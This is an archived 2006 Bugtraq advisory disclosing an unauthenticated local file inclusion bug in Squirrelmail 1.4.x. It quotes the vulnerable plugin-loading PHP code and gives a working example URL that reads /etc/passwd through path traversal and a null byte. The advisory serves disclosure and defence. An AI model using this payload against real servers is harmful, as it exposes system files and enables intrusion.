lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20060601005015.5686.qmail@securityfocus.com>
Date: 1 Jun 2006 00:50:15 -0000
From: brokejunker@...oo.com
To: bugtraq@...urityfocus.com
Subject: Squirrelmail local file inclusion


Squirrelmail local file inclusion bug in functions/plugin.php .
Tested on the latest 1.4.x version.
No authentication needed.

if (isset($plugins) && is_array($plugins)) {
    foreach ($plugins as $name) {
        use_plugin($name);
    }
...
function use_plugin ($name) {
    if (file_exists(SM_PATH . "plugins/$name/setup.php")) {
        include_once(SM_PATH . "plugins/$name/setup.php");
        $function = "squirrelmail_plugin_init_$name";
        if (function_exists($function)) {
            $function();
        }
    }
}
....

If register_globals is on we can control the $name variable.

In order to avoid errors SM_PATH needs to be defined. Exploitation
is done through src/redirect.php ( it includes functions/plugin.php
prior to authentication and it defines SM_PATH ).

magic_quotes_gpc needs to be off.


Example:
http://[host]/[squirrelmail dir]/src/redirect.php?plugins[]=../../../../etc/passwd%00


Denix Solutions
Unix/Linux Solutions for your Business
http://www.denixsolutions.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ